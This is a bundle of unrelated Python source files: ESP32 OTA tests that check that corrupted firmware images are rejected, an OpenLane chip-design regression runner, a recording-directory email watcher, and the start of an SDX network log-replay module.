    binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
    bin_size = os.path.getsize(binary_file)
    ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
    # start test
    host_ip = get_my_ip()
    # Spawn the local HTTPS file server only if nothing already listens there.
    if (get_server_status(host_ip, server_port) is False):
        thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
        thread1.daemon = True
        thread1.start()
    dut1.start_app()
    dut1.expect('Loaded app from partition at offset', timeout=30)
    try:
        ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=60)
        print('Connected to AP with IP: {}'.format(ip_address))
    except DUT.ExpectTimeout:
        raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
        # NOTE(review): unreachable — the raise above exits first.
        thread1.terminate()
    dut1.expect('Starting OTA example', timeout=30)
    print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
    dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
    # The device must reject the short image during validation.
    dut1.expect('native_ota_example: Image validation failed, image is corrupted', timeout=20)
    os.remove(binary_file)
    thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_native_ota_example_truncated_header(env, extra_data):
    """
    Working of OTA if headers of binary file are truncated is validated in this test case.
    Application should return with error message in this case.
    steps: |
      1. join AP
      2. Generate binary file with truncated headers
      3. Fetch OTA image over HTTPS
      4. Check working of code if headers are not sent completely
    """
    dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
    server_port = 8002
    # Original binary file generated after compilation
    bin_name = 'native_ota.bin'
    # Truncated binary file to be generated from original binary file
    truncated_bin_name = 'truncated_header.bin'
    # Size of truncated file to be generated. This value should be less than 288 bytes (image header size)
    truncated_bin_size = 180
    # Produce the header-truncated copy of the image.
    binary_file = os.path.join(dut1.app.binary_path, bin_name)
    f = open(binary_file, 'rb+')
    fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
    fo.write(f.read(truncated_bin_size))
    fo.close()
    f.close()
    binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
    bin_size = os.path.getsize(binary_file)
    ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
    # start test
    host_ip = get_my_ip()
    # Spawn the local HTTPS file server only if nothing already listens there.
    if (get_server_status(host_ip, server_port) is False):
        thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
        thread1.daemon = True
        thread1.start()
    dut1.start_app()
    dut1.expect('Loaded app from partition at offset', timeout=30)
    try:
        ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=60)
        print('Connected to AP with IP: {}'.format(ip_address))
    except DUT.ExpectTimeout:
        raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
        # NOTE(review): unreachable — the raise above exits first.
        thread1.terminate()
    dut1.expect('Starting OTA example', timeout=30)
    print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
    dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
    # An incomplete header must be rejected before image validation starts.
    dut1.expect('native_ota_example: received package is not fit len', timeout=20)
    os.remove(binary_file)
    thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_native_ota_example_random(env, extra_data):
    """
    Working of OTA if random data is added in binary file are validated in this test case.
    Magic byte verification should fail in this case.
    steps: |
      1. join AP
      2. Generate random binary image
      3. Fetch OTA image over HTTPS
      4. Check working of code for random binary file
    """
    dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
    server_port = 8002
    # Random binary file to be generated
    random_bin_name = 'random.bin'
    # Size of random binary file. 32000 is chosen to reduce the time required to run the test case
    random_bin_size = 32000
    # Generate the random image.
    binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
    fo = open(binary_file, 'wb+')
    # First byte of binary file is always set to zero. If first byte is generated randomly,
    # in some cases it may generate 0xE9 which will result in failure of testcase.
    fo.write(struct.pack('B', 0))
    for i in range(random_bin_size - 1):
        # NOTE(review): randrange(0,255,1) yields 0..254, so 0xFF never
        # appears in the payload — presumably harmless here; confirm.
        fo.write(struct.pack('B', random.randrange(0,255,1)))
    fo.close()
    bin_size = os.path.getsize(binary_file)
    ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
    # start test
    host_ip = get_my_ip()
    # Spawn the local HTTPS file server only if nothing already listens there.
    if (get_server_status(host_ip, server_port) is False):
        thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
        thread1.daemon = True
        thread1.start()
    dut1.start_app()
    dut1.expect('Loaded app from partition at offset', timeout=30)
    try:
        ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=60)
        print('Connected to AP with IP: {}'.format(ip_address))
    except DUT.ExpectTimeout:
        raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
        # NOTE(review): unreachable — the raise above exits first.
        thread1.terminate()
    dut1.expect('Starting OTA example', timeout=30)
    print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name))
    dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name)
    # The bootloader-level magic-byte check must reject the random payload.
    dut1.expect('esp_ota_ops: OTA image has invalid magic byte', timeout=20)
    os.remove(binary_file)
    thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_native_ota_example_chunked(env, extra_data):
    """
    This is a positive test case, which downloads complete binary file multiple number of times.
    Number of iterations can be specified in variable iterations.
    steps: |
      1. join AP
      2. Fetch OTA image over HTTPS
      3. Reboot with the new OTA image
    """
    dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
    # File to be downloaded. This file is generated after compilation
    bin_name = 'native_ota.bin'
    # check and log bin size
    binary_file = os.path.join(dut1.app.binary_path, bin_name)
    bin_size = os.path.getsize(binary_file)
    ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
    # start test
    host_ip = get_my_ip()
    # Serve the image via `openssl s_server -WWW` on port 8070.
    chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
    dut1.start_app()
    dut1.expect('Loaded app from partition at offset', timeout=30)
    try:
        ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
        print('Connected to AP with IP: {}'.format(ip_address))
    except DUT.ExpectTimeout:
        raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
    dut1.expect('Starting OTA example', timeout=30)
    print('writing to device: {}'.format('https://' + host_ip + ':8070/' + bin_name))
    dut1.write('https://' + host_ip + ':8070/' + bin_name)
    dut1.expect('Loaded app from partition at offset', timeout=60)
    dut1.expect('Starting OTA example', timeout=30)
    # Tear down the server and the PEM files get_ca_cert() materialised.
    chunked_server.kill()
    os.remove(os.path.join(dut1.app.binary_path, 'server_cert.pem'))
    os.remove(os.path.join(dut1.app.binary_path, 'server_key.pem'))
if __name__ == '__main__':
    # NOTE(review): the functions are called without (env, extra_data) here —
    # presumably the ttfw_idf.idf_example_test decorator supplies them when a
    # wrapped test is invoked directly; confirm against the framework.
    test_examples_protocol_native_ota_example()
    test_examples_protocol_native_ota_example_chunked()
    test_examples_protocol_native_ota_example_truncated_bin()
    test_examples_protocol_native_ota_example_truncated_header()
    test_examples_protocol_native_ota_example_random()
|
run_designs.py | # Copyright 2020 Efabless Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import queue
import sys
import time
import subprocess
import threading
import logging
import datetime
import argparse
import os
import copy
from collections import OrderedDict
from scripts.report.report import Report
from scripts.config.config import ConfigHandler
import scripts.utils.utils as utils
# Command-line interface for the regression runner.
parser = argparse.ArgumentParser(
    description="Regression test on designs")
parser.add_argument('--config_tag', '-c', action='store', default='config',
                    help="config file")
parser.add_argument('--regression', '-r', action='store', default=None,
                    help="regression file")
parser.add_argument('--designs', '-d', nargs='+', default=['spm'],
                    help="designs to run")
parser.add_argument('--tag', '-t', action='store', default='regression',
                    help="tag the log file")
parser.add_argument('--threads', '-th', action='store', type=int, default=5,
                    help="number of designs in parallel")
parser.add_argument('--configuration_parameters', '-cp', action='store', default=None,
                    help="file containing configuration parameters to write in report, to report all possible configurations add: all ")
parser.add_argument('--append_configurations', '-app', action='store_true', default=False,
                    help="append configuration parameters provided to the existing default printed configurations")
parser.add_argument('--clean', '-cl', action='store_true', default=False,
                    help="cleans all intermediate files in runs")
parser.add_argument('--delete', '-dl', action='store_true', default=False,
                    help="deletes the whole run directory upon completion leaving only the final_report.txt file")
parser.add_argument('--tarList', '-tar', nargs='+', default=None,
                    help="tars the specified sub directories and deletes the whole directory leaving only the compressed version")
parser.add_argument('--htmlExtract', '-html', action='store_true', default=False,
                    help="An option to extract an html summary of the final csv summary")
parser.add_argument('--defaultTestSet', '-dts', action='store_true', default=False,
                    help="Runs the default test set (all designs under ./designs/) to generate the regression sheet")
parser.add_argument('--excluded_designs', '-e', nargs='+', default=[],
                    help="designs to exclude from the run")
parser.add_argument('--benchmark', '-b', action='store', default=None,
                    help="benchmark report file to compare with")
parser.add_argument('--print_rem', '-p', action='store', default=None,
                    help="Takes a time period, and prints the list of remaining designs periodically based on it")
parser.add_argument('--disable_timestamp', '-dt',action='store_true', default=False,
                    help="Disables appending the timestamp to the file names and tags.")
parser.add_argument('--show_output', '-so',action='store_true', default=False,
                    help="Enables showing the ./flow.tcl output into the stdout. If more than one design/more than one configuration is run, this flag will be treated as False, even if specified otherwise.")
args = parser.parse_args()
regression = args.regression
tag = args.tag

# Build the list of designs to run.
if args.defaultTestSet:
    # Keep only real directories under ./designs/. (The original removed
    # entries from `designs` while iterating it, which skips the element
    # following every removed one.)
    designs = [x for x in os.listdir('./designs/')
               if os.path.isdir('./designs/' + x)]
else:
    # Deduplicate while preserving the order given on the command line.
    designs = list(OrderedDict.fromkeys(args.designs))

excluded_designs = list(OrderedDict.fromkeys(args.excluded_designs))
for excluded_design in excluded_designs:
    if excluded_design in designs:
        designs.remove(excluded_design)

# Live flow output is only meaningful for a single design / single config run.
show_log_output = args.show_output and (len(designs) == 1) and (args.regression is None)

# Periodic remaining-designs printing; disabled when live output is shown.
if args.print_rem is not None and not show_log_output:
    if float(args.print_rem) > 0:
        mutex = threading.Lock()
        print_rem_time = float(args.print_rem)
    else:
        print_rem_time = None
else:
    print_rem_time = None
if print_rem_time is not None:
    # Map design -> number of runs still pending (used by the periodic printer).
    rem_designs = dict.fromkeys(designs, 1)
num_workers = args.threads
config = args.config_tag
tarList = ['']
if args.tarList is not None:
    tarList = list(OrderedDict.fromkeys(args.tarList))
if args.regression is not None:
    # Collect the parameter names (left of "=") from the regression file,
    # stopping at the first token that contains "extra".
    regressionConfigurationsList = []
    regressionFileOpener = open(regression,"r")
    regressionFileContent = regressionFileOpener.read().split()
    regressionFileOpener.close()
    for k in regressionFileContent:
        if k.find("=") == -1:
            continue
        if k.find("extra") != -1:
            break
        else:
            regressionConfigurationsList.append(k.split("=")[0])
    if len(regressionConfigurationsList):
        ConfigHandler.update_configuration_values(regressionConfigurationsList,True)
# Optional extra configuration parameters to include in the report.
if args.configuration_parameters is not None:
    if args.configuration_parameters == "all":
        ConfigHandler.update_configuration_values_to_all(args.append_configurations)
    else:
        try:
            # Context manager guarantees the file is closed (the original
            # leaked the handle and dead-checked `mode == 'r'`, which is
            # always true for a file opened with "r").
            with open(args.configuration_parameters, "r") as tmpFile:
                configuration_parameters = tmpFile.read().split(",")
            ConfigHandler.update_configuration_values(configuration_parameters, args.append_configurations)
        except OSError:
            print("Could not open/read file:", args.configuration_parameters)
            sys.exit()
# Output locations: results directory plus a base name for .log/.csv files.
store_dir = ""
report_file_name = ""
if args.disable_timestamp:
    store_dir = "./regression_results/{tag}/".format(tag=tag)
    report_file_name = "{store_dir}/{tag}".format(store_dir=store_dir, tag=tag)
else:
    # Compute the timestamp once so the directory and the report base name
    # cannot diverge if the two datetime.now() calls straddled a minute
    # boundary (as the original code could).
    date = datetime.datetime.now().strftime('%d_%m_%Y_%H_%M')
    store_dir = "./regression_results/{tag}_{date}/".format(tag=tag, date=date)
    report_file_name = "{store_dir}/{tag}_{date}".format(store_dir=store_dir, tag=tag, date=date)
if not os.path.exists(store_dir):
    os.makedirs(store_dir, exist_ok=True)

# "log": human-readable progress, mirrored to file and stderr.
log = logging.getLogger("log")
log_formatter = logging.Formatter('[%(asctime)s - %(levelname)5s] %(message)s')
handler1 = logging.FileHandler("{report_file_name}.log".format(report_file_name=report_file_name), 'w')
handler1.setFormatter(log_formatter)
log.addHandler(handler1)
handler2 = logging.StreamHandler()
handler2.setFormatter(log_formatter)
log.addHandler(handler2)
log.setLevel(logging.INFO)

# "report_log": raw CSV rows only; starts with the combined header line.
report_log = logging.getLogger("report_log")
report_formatter = logging.Formatter('%(message)s')
report_handler = logging.FileHandler("{report_file_name}.csv".format(report_file_name=report_file_name), 'w')
report_handler.setFormatter(report_formatter)
report_log.addHandler(report_handler)
report_log.setLevel(logging.INFO)
report_log.info(Report.get_header() + "," + ConfigHandler.get_header())
# Gate so the periodic printer stays silent until the work queue is populated.
allow_print_rem_designs = False

def printRemDesignList():
    # Re-arms itself via threading.Timer every print_rem_time seconds and
    # cancels the next shot once all designs have finished.
    t = threading.Timer(print_rem_time, printRemDesignList)
    t.start()
    if allow_print_rem_designs:
        print("Remaining designs (design, # of times): ",rem_designs)
    if len(rem_designs) == 0:
        t.cancel()
def rmDesignFromPrintList(design):
    """Decrement the remaining-run count for *design*; drop it at zero.

    Called from multiple worker threads, so the whole read-modify-remove
    sequence runs under the mutex. (The original checked membership before
    acquiring the lock, leaving a window where two workers could both pass
    the check and one would then KeyError.)
    """
    with mutex:
        if design in rem_designs:
            rem_designs[design] -= 1
            if rem_designs[design] == 0:
                rem_designs.pop(design)
if print_rem_time is not None:
    # Start the self-rescheduling reporter, then allow it to print.
    printRemDesignList()
    allow_print_rem_designs = True
def run_design(designs_queue):
    """Worker loop: pop (design, config, tag, design_name) tuples and run the flow.

    Each design runs via ./flow.tcl. On failure an error.txt is written to the
    run directory; afterwards a per-design report row is emitted, followed by
    the optional benchmark-comparison / clean / tar / delete post-steps.
    """
    while not designs_queue.empty():
        design, config, tag, design_name = designs_queue.get(timeout=3)  # 3s timeout
        run_path = utils.get_run_path(design=design, tag=tag)
        log.info('{design} {tag} running'.format(design=design, tag=tag))
        # (The original computed a `command` here and immediately overwrote
        # it below — that dead store has been removed.)
        if show_log_output:
            command = './flow.tcl -design {design} -tag {tag} -overwrite -config_tag {config} -no_save'.format(design=design, tag=tag, config=config)
        else:
            command = './flow.tcl -design {design} -tag {tag} -overwrite -disable_output -config_tag {config} -no_save'.format(design=design, tag=tag, config=config)
        skip_rm_from_rems = False
        try:
            if show_log_output:
                # Stream the flow output live, line by line.
                process = subprocess.Popen(command.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
                while True:
                    output = process.stdout.readline()
                    if not output:
                        break
                    if output:
                        print(str(output.strip())[2:-1])
            else:
                subprocess.check_output(command.split(), stderr=subprocess.PIPE)
        except subprocess.CalledProcessError as e:
            # Flow failed: record it, persist stderr, and stop counting this
            # design twice in the remaining-designs tracker.
            if print_rem_time is not None:
                rmDesignFromPrintList(design)
                skip_rm_from_rems = True
            error_msg = e.stderr.decode(sys.getfilesystemencoding())
            log.error('{design} {tag} failed check {run_path}error.txt'.format(design=design, run_path=run_path, tag=tag))
            with open(run_path + "error.txt", "w") as error_file:
                error_file.write(error_msg)
        if print_rem_time is not None and not skip_rm_from_rems:
            rmDesignFromPrintList(design)
        # A report row is written whether the flow succeeded or failed.
        log.info('{design} {tag} finished\t Writing report..'.format(design=design, tag=tag))
        params = ConfigHandler.get_config(design, tag)
        report = Report(design, tag, design_name, params).get_report()
        report_log.info(report)
        with open(run_path + "final_report.txt", "w") as report_file:
            report_file.write(Report.get_header() + "," + ConfigHandler.get_header())
            report_file.write("\n")
            report_file.write(report)
        if args.benchmark is not None:
            try:
                log.info('{design} {tag} Comparing vs benchmark results..'.format(design=design, tag=tag))
                design_benchmark_comp_cmd = "python3 scripts/compare_regression_design.py -b {benchmark} -r {this_run} -o {output_report} -d {design} -rp {run_path}".format(
                    benchmark=args.benchmark,
                    this_run=report_file_name + ".csv",
                    output_report=report_file_name + "_design_test_report.csv",
                    design=design,
                    run_path=run_path
                )
                subprocess.check_output(design_benchmark_comp_cmd.split())
            except subprocess.CalledProcessError as e:
                error_msg = e.stderr.decode(sys.getfilesystemencoding())
                log.error('{design} {tag} failed to compare with benchmark: {error_msg}'.format(design=design, tag=tag, error_msg=error_msg))
        if args.clean:
            try:
                # Keep merged_unpadded.lef, then drop the rest of tmp/.
                log.info('{design} {tag} Cleaning tmp Directory..'.format(design=design, tag=tag))
                moveUnPadded_cmd = "cp {run_path}/tmp/merged_unpadded.lef {run_path}/results/".format(
                    run_path=run_path,
                    tag=tag
                )
                subprocess.check_output(moveUnPadded_cmd.split())
                clean_cmd = "rm -rf {run_path}/tmp/".format(
                    run_path=run_path,
                    tag=tag
                )
                subprocess.check_output(clean_cmd.split())
                log.info('{design} {tag} Cleaning tmp Directory Finished'.format(design=design, tag=tag))
            except subprocess.CalledProcessError as e:
                error_msg = e.stderr.decode(sys.getfilesystemencoding())
                log.error('{design} {tag} failed to clean the tmp directory: {error_msg}'.format(design=design, tag=tag, error_msg=error_msg))
        if tarList[0] != "":
            log.info('{design} {tag} Compressing Run Directory..'.format(design=design, tag=tag))
            try:
                if 'all' in tarList:
                    # Archive the whole run directory.
                    tarAll_cmd = "tar -cvzf {run_path}../{design_name}_{tag}.tar.gz {run_path}".format(
                        run_path=run_path,
                        design_name=design_name,
                        tag=tag
                    )
                    subprocess.check_output(tarAll_cmd.split())
                else:
                    # Archive only the requested sub-directories.
                    tarString = "tar -cvzf {run_path}../{design_name}_{tag}.tar.gz"
                    for dirc in tarList:
                        tarString += " {run_path}" + dirc
                    tar_cmd = tarString.format(
                        run_path=run_path,
                        design_name=design_name,
                        tag=tag
                    )
                    subprocess.check_output(tar_cmd.split())
                log.info('{design} {tag} Compressing Run Directory Finished'.format(design=design, tag=tag))
            except subprocess.CalledProcessError as e:
                log.info('{design} {tag} Compressing Run Directory Failed'.format(design=design, tag=tag))
        if args.delete:
            try:
                log.info('{design} {tag} Deleting Run Directory..'.format(design=design, tag=tag))
                deleteDirectory = "rm -rf {run_path}".format(
                    run_path=run_path
                )
                subprocess.check_output(deleteDirectory.split())
                log.info('{design} {tag} Deleting Run Directory Finished..'.format(design=design, tag=tag))
            except subprocess.CalledProcessError as e:
                error_msg = e.stderr.decode(sys.getfilesystemencoding())
                log.error('{design} {tag} failed to delete the run directory: {error_msg}'.format(design=design, tag=tag, error_msg=error_msg))
# Populate the work queue with (design, config, config_tag, design_name).
que = queue.Queue()
total_runs = 0
if regression is not None:
    # Regression mode: generate one config per regression combination.
    regression_file = os.path.join(os.getcwd(), regression)
    number_of_configs = 0
    for design in designs:
        base_path = utils.get_design_path(design=design)
        if base_path is None:
            log.error("{design} not found, skipping...".format(design=design))
            if print_rem_time is not None:
                if design in rem_designs.keys():
                    rem_designs.pop(design)
            continue
        design_name = utils.get_design_name(design, config)
        if design_name.startswith("[INVALID]:"):
            log.error('{design} will not Run, {reason}'.format(design=design, reason=design_name))
            continue
        base_config_path = base_path + "base_config.tcl"
        ConfigHandler.gen_base_config(design, base_config_path)
        gen_config_cmd = "./scripts/config/generate_config.sh {base_config} {output_path} config_{tag} {regression_file}".format(
            base_config=base_config_path,
            output_path=base_path,
            tag=tag,
            regression_file=regression_file
        )
        # generate_config.sh prints the number of generated configurations.
        number_of_configs = subprocess.check_output(gen_config_cmd.split())
        number_of_configs = int(number_of_configs.decode(sys.getdefaultencoding()))
        total_runs = total_runs + number_of_configs
        if print_rem_time is not None:
            rem_designs[design] = number_of_configs
        for i in range(number_of_configs):
            config_tag = "config_{tag}_{idx}".format(
                tag=tag,
                idx=i
            )
            # (An unused `config_file` path string was computed here in the
            # original; removed.)
            que.put((design, config_tag, config_tag, design_name))
else:
    # Plain mode: one run per design with the CLI-selected config.
    for design in designs:
        base_path = utils.get_design_path(design=design)
        if base_path is None:
            log.error("{design} not found, skipping...".format(design=design))
            if print_rem_time is not None:
                if design in rem_designs.keys():
                    rem_designs.pop(design)
            continue
        default_config_tag = "config_{tag}".format(tag=tag)
        design_name = utils.get_design_name(design, config)
        if design_name.startswith("[INVALID]:"):
            log.error('{design} Will not Run, {reason}'.format(design=design, reason=design_name))
            continue
        que.put((design, config, default_config_tag, design_name))
# Launch the worker pool and wait for every thread to drain the queue.
workers = []
for i in range(num_workers):
    workers.append(threading.Thread(target=run_design, args=(que,)))
    workers[i].start()
for i in range(num_workers):
    # Thread.isAlive() was removed in Python 3.9; is_alive() is the portable
    # spelling. join(100) keeps the main thread responsive to signals.
    while workers[i].is_alive():
        workers[i].join(100)
    print("Exiting thread", i)
log.info("Getting top results..")
# Extract the best configuration per design from the aggregated CSV.
best_result_cmd = "python3 ./scripts/report/get_best.py -i {input} -o {output}".format(
    input=report_handler.baseFilename,
    output=report_file_name + "_best.csv"
)
subprocess.check_output(best_result_cmd.split())
if args.htmlExtract:
    # Optional HTML renditions of the full and best CSV summaries.
    log.info("Converting to html..")
    csv2html_result_cmd = "python3 ./scripts/csv2html/csv2html.py -i {input} -o {output}".format(
        input=report_file_name + ".csv",
        output=report_file_name + ".html"
    )
    subprocess.check_output(csv2html_result_cmd.split())
    csv2besthtml_result_cmd = "python3 ./scripts/csv2html/csv2html.py -i {input} -o {output}".format(
        input=report_file_name + "_best.csv",
        output=report_file_name + "_best.html"
    )
    subprocess.check_output(csv2besthtml_result_cmd.split())
# Append derived statistics columns to both CSVs in place.
utils.addComputedStatistics(report_file_name + ".csv")
utils.addComputedStatistics(report_file_name + "_best.csv")
if args.benchmark is not None:
    # Whole-run comparison against the provided benchmark report.
    log.info("Generating final benchmark results..")
    full_benchmark_comp_cmd = "python3 scripts/compare_regression_reports.py -ur -b {benchmark} -r {this_run} -o {output_report} -x {output_xlsx}".format(
        benchmark=args.benchmark,
        this_run=report_file_name + ".csv",
        output_report=report_file_name + "_benchmark_written_report.rpt",
        output_xlsx=report_file_name + "_benchmark_final_report.xlsx"
    )
    subprocess.check_output(full_benchmark_comp_cmd.split())
log.info("Done")
|
douyustatus.py | from mail import send_mail
import os,time,sys
from threading import Thread
# --- watcher configuration ---------------------------------------------------
# The SMTP password is asked interactively so it never lands in this file.
password = input("pass:")
# Recording directories to watch, one watcher thread per directory
# (Douyu / Huya / Bilibili recorders).
filepath = "/root/b/d/d"
filepath2 = "/root/b/d/huya"
filepath3 = '/root/b/d'
# Alert mail subjects per platform ("<platform> has no files").
subject = "斗鱼没文件"
subject2 = "虎牙没文件"
subject3 = 'bilibili没文件'
# Mail body: "no recording files left, something may be wrong, please check".
contents = "没有录制文件了,可能出错了,请检查"
# NOTE(review): this module-level counter is never read by running(), which
# rebinds a local `retry` instead — confirm it is intentional before relying on it.
retry = 0
def running(filepath, subject, contents, password):
    """Poll *filepath* forever; mail an alert whenever the directory is empty.

    :param filepath: directory whose contents are checked once a minute
    :param subject:  mail subject used for the alert
    :param contents: mail body used for the alert
    :param password: SMTP password forwarded to send_mail()
    Never returns; intended to run inside a daemon-style Thread.
    """
    # BUGFIX: the original read the module-level `retry` without a `global`
    # declaration while also assigning to it, so the empty-directory branch
    # raised UnboundLocalError on `retry = retry + 1`. Keep the counter local.
    retry = 0
    while True:
        t = time.strftime('%c', time.localtime(time.time()))
        sys.stdout.write("\r{}检查文件中 当前时间{}".format(filepath, t))
        files = os.listdir(filepath)
        if not files:
            send_mail(subject, contents, password)
            time.sleep(60)
            retry = retry + 1
            # After 10 consecutive alerts, back off for an hour to avoid
            # flooding the mailbox.
            if retry >= 10:
                retry = 0
                time.sleep(3600)
        else:
            retry = 0
            time.sleep(60)
# One watcher thread per platform directory; note name=('douyu') is just a
# parenthesised string, not a tuple.
a=Thread(target=running,args=(filepath,subject,contents,password,),name=('douyu'))
b=Thread(target=running,args=(filepath2,subject2,contents,password,),name=('huya'))
c=Thread(target=running,args=(filepath3,subject3,contents,password,),name=('bili'))
a.start()
b.start()
c.start()
# running() loops forever, so these joins never return; they just keep the
# main thread alive alongside the workers.
a.join()
b.join()
c.join()
|
replay.py | #!/usr/bin/env python
# Author:
# Rudiger Birkner (ETH Zurich)
import argparse
import logging
import time
import redis
import math
from collections import namedtuple, defaultdict
from threading import Thread
def pretty(d, indent=0):
    """Recursively print nested dict *d*, one key per line, indented by depth.

    Python 2 only: relies on the print statement and dict.iteritems().
    """
    for key, value in d.iteritems():
        print '\t' * indent + str(key)
        if isinstance(value, dict):
            pretty(value, indent+1)
        else:
            print '\t' * (indent+1) + str(value)
# Maps raw node labels from the config file onto the display names used on the
# published network graph; many raw labels collapse onto one node (e.g. every
# MAIN_* variant is shown as "Main").
name_mapping = {
    "MAIN": "Main",
    "MAIN_DFLT": "Main",
    "MAIN_C_DFLT": "Main",
    "MAIN_C1": "Main",
    "MAIN_C2": "Main",
    "OUTBOUND": "Outbound",
    "OUTBOUND4IN": "Outbound",
    "INBOUND": "InBound",
    "INBOUND_DFLT": "InBound",
    "INBOUND_B1": "InBound",
    "INBOUND_C1": "InBound",
    "INBOUND_C2": "InBound",
    "ARP": "Main",
    "ARPPXY": "ARP-Proxy",
    "BGP": "BGP-Proxy",
    "BGP_ARP": "BGP-Proxy",
    "A1": "Router-A",
    "A1_BGP": "Router-A",
    "A1_ARP": "Router-A",
    "VA1": "Router-A",
    "VA1_ARP": "Router-A",
    "B1": "Router-B",
    "B1_BGP": "Router-B",
    "B1_ARP": "Router-B",
    "VB1": "Router-B",
    "VB1_ARP": "Router-B",
    "C1": "Router-C1",
    "C1_BGP": "Router-C1",
    "C1_ARP": "Router-C1",
    "VC1": "Router-C1",
    "VC1_ARP": "Router-C1",
    "C2": "Router-C2",
    "C2_BGP": "Router-C2",
    "C2_ARP": "Router-C2",
    "VC2": "Router-C2",
    "VC2_ARP": "Router-C2",
    "BAD": "bad",
}
# Collapses raw traffic labels onto the three published traffic classes.
traffic_mapping = {
    "bgp": "bgp",
    "arp": "arp",
    "arp_v": "arp",
    "default": "default",
    "default_v": "default",
    "b1_v": "default",
    "c1_v": "default",
    "c2_v": "default",
}
# Catalogue driving LogHistory.next_values(): per message type, the graph
# edges to publish as (source, destination, [traffic filter]) — an empty
# filter means all traffic types — plus whether the published value is a
# per-step "difference" or a running "total".
messages = {
    "network_graph": {
        "type": "difference",
        "values": [("Outbound", "Main", []),
                   ("Main", "Outbound", []),
                   ("InBound", "Main", []),
                   ("Main", "InBound", []),
                   ("Main", "Router-A", []),
                   ("Router-A", "Main", []),
                   ("Main", "Router-B", []),
                   ("Router-B", "Main", []),
                   ("Main", "Router-C1", []),
                   ("Router-C1", "Main", []),
                   ("Main", "Router-C2", []),
                   ("Router-C2", "Main", []),
                   ("Main", "ARP-Proxy", ["arp"]),
                   ("ARP-Proxy", "Main", ["arp"]),
                   ("Main", "BGP-Proxy", ["bgp"]),
                   ("BGP-Proxy", "Main", ["bgp"]),
                   ("Outbound", "InBound", []),
                   ("InBound", "Outbound", []),
                   ],
    },
    "time_series": {
        "type": "difference",
        "values": [("Main", "Router-B", ["default"]),
                   ("Main", "Router-C1", ["default"]),
                   ("Main", "Router-C2", ["default"])],
    },
}
class LogReplay(object):
    """Pulls the next batch of values from a LogHistory once per time step and
    publishes each entry as a '|'-joined message."""

    def __init__(self, log_history, publisher, time_step=1, debug=False):
        self.logger = logging.getLogger("LogReplay")
        if debug:
            self.logger.setLevel(logging.DEBUG)
        self.log_history = log_history
        self.publisher = publisher
        self.time_step = time_step
        self.run = False

    def start(self):
        """Replay loop: fetch, publish, then sleep off the rest of the step."""
        self.run = True
        while self.run:
            cycle_began = time.time()

            for entry in self.log_history.next_values():
                message = "|".join(entry)
                self.logger.debug(message)
                self.publisher.publish(message)

            # Sleep only for whatever is left of this time step.
            remaining = self.time_step - time.time() + cycle_began
            if remaining < 0:
                remaining = 0
                self.logger.debug("processing took longer than the time step")

            self.logger.info("sleep for " + str(remaining) + "s")
            time.sleep(remaining)

    def stop(self):
        """Ask the replay loop to exit after the current iteration."""
        self.run = False
class LogHistory(object):
    """Parses flow/port statistics logs into per-edge, per-traffic-type byte
    counters, indexed by timestep.

    Python 2 code: uses dict.iteritems() throughout.
    """
    def __init__(self, config, flows_dir, ports_dir, num_timesteps, debug=False):
        self.logger = logging.getLogger("LogHistory")
        if debug:
            self.logger.setLevel(logging.DEBUG)
        # Label attached to every counter: which graph edge and traffic type it feeds.
        self.log_entry = namedtuple("LogEntry", "source destination type")
        self.ports = defaultdict(list)  # (dpid, port) -> [LogEntry, ...]
        self.flows = defaultdict(list)  # flow cookie -> [LogEntry, ...]
        # data[(src, dst)][traffic_type][timestep] -> cumulative byte count
        self.data = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))
        self.current_timestep = 0
        self.total_timesteps = num_timesteps
        self.parse_config(config)
